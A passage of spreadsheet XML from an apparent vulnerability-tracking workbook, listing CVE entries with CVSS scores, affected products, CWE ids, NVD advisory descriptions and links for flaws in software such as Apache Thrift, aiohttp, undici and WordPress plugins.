      <c r="F2484" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2484" s="5" t="inlineStr"/>
      <c r="H2484" s="5" t="inlineStr">
        <is>
          <t>versa-networks:versa_director</t>
        </is>
      </c>
      <c r="I2484" s="5" t="inlineStr">
        <is>
          <t>2025-06-19</t>
        </is>
      </c>
      <c r="J2484" s="5" t="inlineStr"/>
      <c r="K2484" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2484" s="5"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weaknesses that can be exploited, potentially leading to remote code execution. 
Versa Networks is not aware of any reported instance where this vulnerability was exploited. Proof of concept for this vulnerability has been disclosed by third party security researchers.  
Workarounds or Mitigation: 
Restrict access to TCP port 6080 if uCPE console access is not necessary. Versa recommends that Director be upgraded to one of the remediated software versions.</t>
        </is>
      </c>
      <c r="M2484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-23173</t>
        </is>
      </c>
    </row>
    <row r="2485">
      <c r="A2485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2485" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48431</t>
        </is>
      </c>
      <c r="C2485" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2485" s="5" t="inlineStr"/>
      <c r="F2485" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2485" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2485" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I2485" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J2485" s="5" t="inlineStr"/>
      <c r="K2485" s="5" t="inlineStr">
        <is>
          <t>CWE-762, CWE-763</t>
        </is>
      </c>
      <c r="L2485" s="5" t="inlineStr">
        <is>
          <t>Mismatched Memory Management Routines vulnerability in Apache Thrift c_glib language bindings.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.
Description: Specially crafted requests can crash an c_glib-based Thrift server with a clean but fatal "free(): invalid pointer" error message.</t>
        </is>
      </c>
      <c r="M2485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48431</t>
        </is>
      </c>
    </row>
    <row r="2486">
      <c r="A2486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2486" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51675</t>
        </is>
      </c>
      <c r="C2486" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2486" s="5" t="inlineStr"/>
      <c r="F2486" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2486" s="5" t="inlineStr"/>
      <c r="H2486" s="5" t="inlineStr"/>
      <c r="I2486" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2486" s="5" t="inlineStr"/>
      <c r="K2486" s="5" t="inlineStr">
        <is>
          <t>CWE-691</t>
        </is>
      </c>
      <c r="L2486" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in openRISC OR1200 commit 83ac6b. An inaccurate update of program counter (PC) values when SPR changes can lead to a Denial of Service (DoS).</t>
        </is>
      </c>
      <c r="M2486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51675</t>
        </is>
      </c>
    </row>
    <row r="2487">
      <c r="A2487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2487" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-52182</t>
        </is>
      </c>
      <c r="C2487" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2487" s="5" t="inlineStr"/>
      <c r="F2487" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2487" s="5" t="inlineStr"/>
      <c r="H2487" s="5" t="inlineStr"/>
      <c r="I2487" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2487" s="5" t="inlineStr"/>
      <c r="K2487" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2487" s="5" t="inlineStr">
        <is>
          <t>The Library Corporation LS2 Admin v5.7 to v5.8.0 was discovered to contain an information disclosure vulnerability.</t>
        </is>
      </c>
      <c r="M2487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-52182</t>
        </is>
      </c>
    </row>
    <row r="2488">
      <c r="A2488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2488" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61478</t>
        </is>
      </c>
      <c r="C2488" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2488" s="5" t="inlineStr"/>
      <c r="F2488" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2488" s="5" t="inlineStr"/>
      <c r="H2488" s="5" t="inlineStr"/>
      <c r="I2488" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2488" s="5" t="inlineStr"/>
      <c r="K2488" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-830</t>
        </is>
      </c>
      <c r="L2488" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via Spoofed SYN packets.</t>
        </is>
      </c>
      <c r="M2488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61478</t>
        </is>
      </c>
    </row>
    <row r="2489">
      <c r="A2489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2489" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61479</t>
        </is>
      </c>
      <c r="C2489" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2489" s="5" t="inlineStr"/>
      <c r="F2489" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2489" s="5" t="inlineStr"/>
      <c r="H2489" s="5" t="inlineStr"/>
      <c r="I2489" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2489" s="5" t="inlineStr"/>
      <c r="K2489" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L2489" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via the SPC Connect Pro software accepts replayed application-layer payloads injected into an active TCP session.</t>
        </is>
      </c>
      <c r="M2489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61479</t>
        </is>
      </c>
    </row>
    <row r="2490">
      <c r="A2490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2490" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61480</t>
        </is>
      </c>
      <c r="C2490" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2490" s="5" t="inlineStr"/>
      <c r="F2490" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2490" s="5" t="inlineStr"/>
      <c r="H2490" s="5" t="inlineStr"/>
      <c r="I2490" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2490" s="5" t="inlineStr"/>
      <c r="K2490" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-354, CWE-362, CWE-400</t>
        </is>
      </c>
      <c r="L2490" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via spoofed TCP FIN packets without validating the sequence or acknowledgment numbers.</t>
        </is>
      </c>
      <c r="M2490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61480</t>
        </is>
      </c>
    </row>
    <row r="2491">
      <c r="A2491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2491" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61726</t>
        </is>
      </c>
      <c r="C2491" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2491" s="5" t="inlineStr"/>
      <c r="F2491" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="G2491" s="5" t="inlineStr"/>
      <c r="H2491" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2491" s="5" t="inlineStr">
        <is>
          <t>2026-01-28</t>
        </is>
      </c>
      <c r="J2491" s="5" t="inlineStr"/>
      <c r="K2491" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2491" s="5" t="inlineStr">
        <is>
          <t>The net/url package does not set a limit on the number of query parameters in a query. While the maximum size of query parameters in URLs is generally limited by the maximum request header size, the net/http.Request.ParseForm method can parse large URL-encoded forms. Parsing a large form containing many unique query parameters can cause excessive memory consumption.</t>
        </is>
      </c>
      <c r="M2491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61726</t>
        </is>
      </c>
    </row>
    <row r="2492">
      <c r="A2492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2492" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-63913</t>
        </is>
      </c>
      <c r="C2492" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2492" s="5" t="inlineStr"/>
      <c r="F2492" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2492" s="5" t="inlineStr"/>
      <c r="H2492" s="5" t="inlineStr"/>
      <c r="I2492" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J2492" s="5" t="inlineStr"/>
      <c r="K2492" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2492" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in OpenSBI 1.3 allowing attackers to cause a denial of service via crafted request to the SBI function #2 or the 'Find and configure a matching counter' function of SBI PMU extension.</t>
        </is>
      </c>
      <c r="M2492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-63913</t>
        </is>
      </c>
    </row>
    <row r="2493">
      <c r="A2493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2493" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-69223</t>
        </is>
      </c>
      <c r="C2493" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2493" s="5" t="inlineStr"/>
      <c r="F2493" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2493" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2493" s="5" t="inlineStr">
        <is>
          <t>aiohttp:aiohttp</t>
        </is>
      </c>
      <c r="I2493" s="5" t="inlineStr">
        <is>
          <t>2026-01-05</t>
        </is>
      </c>
      <c r="J2493" s="5" t="inlineStr"/>
      <c r="K2493" s="5" t="inlineStr">
        <is>
          <t>CWE-409, CWE-770</t>
        </is>
      </c>
      <c r="L2493" s="5" t="inlineStr">
        <is>
          <t>AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host's memory. This issue is fixed in version 3.13.3.</t>
        </is>
      </c>
      <c r="M2493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-69223</t>
        </is>
      </c>
    </row>
    <row r="2494">
      <c r="A2494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2494" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70147</t>
        </is>
      </c>
      <c r="C2494" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2494" s="5" t="inlineStr"/>
      <c r="F2494" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2494" s="5" t="inlineStr"/>
      <c r="H2494" s="5" t="inlineStr">
        <is>
          <t>projectworlds:online_time_table_generator</t>
        </is>
      </c>
      <c r="I2494" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J2494" s="5" t="inlineStr"/>
      <c r="K2494" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L2494" s="5" t="inlineStr">
        <is>
          <t>Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests to these endpoints without a valid session.</t>
        </is>
      </c>
      <c r="M2494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70147</t>
        </is>
      </c>
    </row>
    <row r="2495">
      <c r="A2495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2495" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70148</t>
        </is>
      </c>
      <c r="C2495" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2495" s="5" t="inlineStr"/>
      <c r="F2495" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2495" s="5" t="inlineStr"/>
      <c r="H2495" s="5" t="inlineStr">
        <is>
          <t>codeastro:membership_management_system</t>
        </is>
      </c>
      <c r="I2495" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J2495" s="5" t="inlineStr"/>
      <c r="K2495" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2495" s="5" t="inlineStr">
        <is>
          <t>Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parameter, resulting in insecure direct object reference (IDOR).</t>
        </is>
      </c>
      <c r="M2495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70148</t>
        </is>
      </c>
    </row>
    <row r="2496">
      <c r="A2496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2496" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70962</t>
        </is>
      </c>
      <c r="C2496" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2496" s="5" t="inlineStr"/>
      <c r="F2496" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2496" s="5" t="inlineStr"/>
      <c r="H2496" s="5" t="inlineStr"/>
      <c r="I2496" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2496" s="5" t="inlineStr"/>
      <c r="K2496" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2496" s="5" t="inlineStr">
        <is>
          <t>Zosi C519M V4.2.8.823C01450BA is vulnerable to Incorrect Access Control. The application contains hardcoded credentials in the RTSP authentication mechanism. An attacker with network access can use the unchangeable default credentials to access the RTSP video stream, resulting in unauthorized viewing of camera footage.</t>
        </is>
      </c>
      <c r="M2496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70962</t>
        </is>
      </c>
    </row>
    <row r="2497">
      <c r="A2497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0860</t>
        </is>
      </c>
      <c r="C2497" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2497" s="5" t="inlineStr"/>
      <c r="F2497" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2497" s="5" t="inlineStr"/>
      <c r="H2497" s="5" t="inlineStr"/>
      <c r="I2497" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2497" s="5" t="inlineStr"/>
      <c r="K2497" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2497" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to gain access to sensitive kernel information.
This issue affects Valhall GPU Kernel Driver: from r29p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0860</t>
        </is>
      </c>
    </row>
    <row r="2498">
      <c r="A2498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12151</t>
        </is>
      </c>
      <c r="C2498" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2498" s="5" t="inlineStr"/>
      <c r="F2498" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2498" s="5" t="inlineStr"/>
      <c r="H2498" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="I2498" s="5" t="inlineStr">
        <is>
          <t>2026-06-17</t>
        </is>
      </c>
      <c r="J2498" s="5" t="inlineStr"/>
      <c r="K2498" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2498" s="5" t="inlineStr">
        <is>
          <t>Impact:
The undici WebSocket client enforces maxPayloadSize on the cumulative byte count of fragments in a message but does not enforce a limit on the number of fragments. A malicious WebSocket server can stream many small or empty continuation frames that each pass per-frame and cumulative-size validation, collectively causing unbounded memory growth in the client process. The result is memory exhaustion and a denial of service.
Affected applications are those using the undici WebSocket client (new WebSocket(...)) or the WebSocketStream API that can be induced to connect to an attacker-controlled or compromised WebSocket endpoint.
All releases starting at undici 6.17.0 are affected.
Patches: Upgrade to undici &gt;= 6.26.0, &gt;= 7.28.0, or &gt;= 8.5.0. Workarounds:
No workaround is available. The fix must be applied through an upgrade.</t>
        </is>
      </c>
      <c r="M2498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12151</t>
        </is>
      </c>
    </row>
    <row r="2499">
      <c r="A2499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12483</t>
        </is>
      </c>
      <c r="C2499" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2499" s="5" t="inlineStr"/>
      <c r="F2499" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2499" s="5" t="inlineStr"/>
      <c r="H2499" s="5" t="inlineStr"/>
      <c r="I2499" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2499" s="5" t="inlineStr"/>
      <c r="K2499" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L2499" s="5" t="inlineStr">
        <is>
          <t>The LearnDash LMS plugin for WordPress is vulnerable to Unrestricted File Type Upload in versions up to and including 5.1.5. This is due to insufficient input validation in the 'learndash_fileupload_process' function, which iterates through an entire array and validates only the first file. This makes it possible for authenticated attackers, with subscriber-level access and above who are enrolled in a course with assignment uploads enabled, to upload arbitrary disallowed files, including PHP files, to the server's wp-content/uploads/learndash/assignments/ directory. The uploaded files can only be used for Remote Code Execution if default server configurations have been changed to allow for execution.</t>
        </is>
      </c>
      <c r="M2499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12483</t>
        </is>
      </c>
    </row>
    <row r="2500">
      <c r="A2500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13297</t>
        </is>
      </c>
      <c r="C2500" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2500" s="5" t="inlineStr"/>
      <c r="F2500" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2500" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2500" s="5" t="inlineStr"/>
      <c r="I2500" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2500" s="5" t="inlineStr"/>
      <c r="K2500" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L2500" s="5" t="inlineStr">
        <is>
          <t>IBM Verify Identity Access Advanced Access Control may be vulnerable to an information disclosure attack.</t>
        </is>
      </c>
      <c r="M2500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13297</t>
        </is>
      </c>
    </row>
    <row r="2501">
      <c r="A2501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13676</t>
        </is>
      </c>
      <c r="C2501" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2501" s="5" t="inlineStr"/>
      <c r="F2501" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2501" s="5" t="inlineStr"/>
      <c r="H2501" s="5" t="inlineStr">
        <is>
          <t>openjsf:fast-uri</t>
        </is>
      </c>
      <c r="I2501" s="5" t="inlineStr">
        <is>
          <t>2026-06-29</t>
        </is>
      </c>
      <c r="J2501" s="5" t="inlineStr"/>
      <c r="K2501" s="5" t="inlineStr">
        <is>
          <t>CWE-436, CWE-551</t>
        </is>
      </c>
      <c r="L2501" s="5" t="inlineStr">
        <is>
          <t>fast-uri v</t>
        </is>
      </c>
      <c r="M2501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13676</t>
        </is>
      </c>
    </row>
    <row r="2502">
      <c r="A2502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14164</t>
        </is>
      </c>
      <c r="C2502" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2502" s="5" t="inlineStr"/>
      <c r="F2502" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2502" s="5" t="inlineStr"/>
      <c r="H2502" s="5" t="inlineStr"/>
      <c r="I2502" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J2502" s="5" t="inlineStr"/>
      <c r="K2502" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2502" s="5" t="inlineStr">
        <is>
          <t>A double free issue has been identified in libarchive's RAR5 reader. During parsing of a specially crafted RAR5 archive, the filtered_buf pointer may remain stale after being freed during unpacking state reinitialization. Subsequent processing of another archive entry can trigger a second free of the same memory region, resulting in a double-free condition. Successful exploitation may cause applications using the vulnerable libarchive API to terminate unexpectedly, leading to a denial of service.</t>
        </is>
      </c>
      <c r="M2502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14164</t>
        </is>
      </c>
    </row>
    <row r="2503">
      <c r="A2503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14296</t>
        </is>
      </c>
      <c r="C2503" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2503" s="5" t="inlineStr"/>
      <c r="F2503" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2503" s="5" t="inlineStr"/>
      <c r="H2503" s="5" t="inlineStr"/>
      <c r="I2503" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2503" s="5" t="inlineStr"/>
      <c r="K2503" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2503" s="5" t="inlineStr">
        <is>
          <t>When using the Direct XIP
update strategy, the main application image starts other cores (i.e. radio
core), based on the currently active slot without additional verification. The
MCUboot in the bare (upstream) configuration assumes that if there is at least
a single slot for each image available, the system is bootable and continues
the boot process. This may lead to a situation when MCUboot picks different
slot for different images (i.e. (a) for the main application and (b) for the
radio image), boots the main application (from slot (a)) that afterwards starts
the radio image by providing an address of the unauthenticated slot ((a)
instead of (b)).</t>
        </is>
      </c>
      <c r="M2503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14296</t>
        </is>
      </c>
    </row>
    <row r="2504">
      <c r="A2504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14444</t>
        </is>
      </c>
      <c r="C2504" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2504" s="5" t="inlineStr"/>
      <c r="F2504" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2504" s="5" t="inlineStr"/>
      <c r="H2504" s="5" t="inlineStr"/>
      <c r="I2504" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2504" s="5" t="inlineStr"/>
      <c r="K2504" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2504" s="5" t="inlineStr">
        <is>
          <t>The WP Fusion (Pro) plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.47.13. This is due to insufficient authorization checks on the role parameter in the ThriveCart Auto Login handler's thrivecart() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, and who possess the access_key, to create a new user account with administrator privileges and gain full control over the WordPress site. The required access_key is intentionally shared with ThriveCart customers as part of the plugin's documented setup process, making it accessible to attackers who have made a purchase. The vulnerability is only exploitable when the ThriveCart Auto Login option is enabled.</t>
        </is>
      </c>
      <c r="M2504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14444</t>
        </is>
      </c>
    </row>
    <row r="2505">
      <c r="A2505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14957</t>
        </is>
      </c>
      <c r="C2505" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2505" s="5" t="inlineStr"/>
      <c r="F2505" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2505" s="5" t="inlineStr"/>
      <c r="H2505" s="5" t="inlineStr"/>
      <c r="I2505" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2505" s="5" t="inlineStr"/>
      <c r="K2505" s="5" t="inlineStr">
        <is>
          <t>CWE-252, CWE-617</t>
        </is>
      </c>
      <c r="L2505" s="5" t="inlineStr">
        <is>
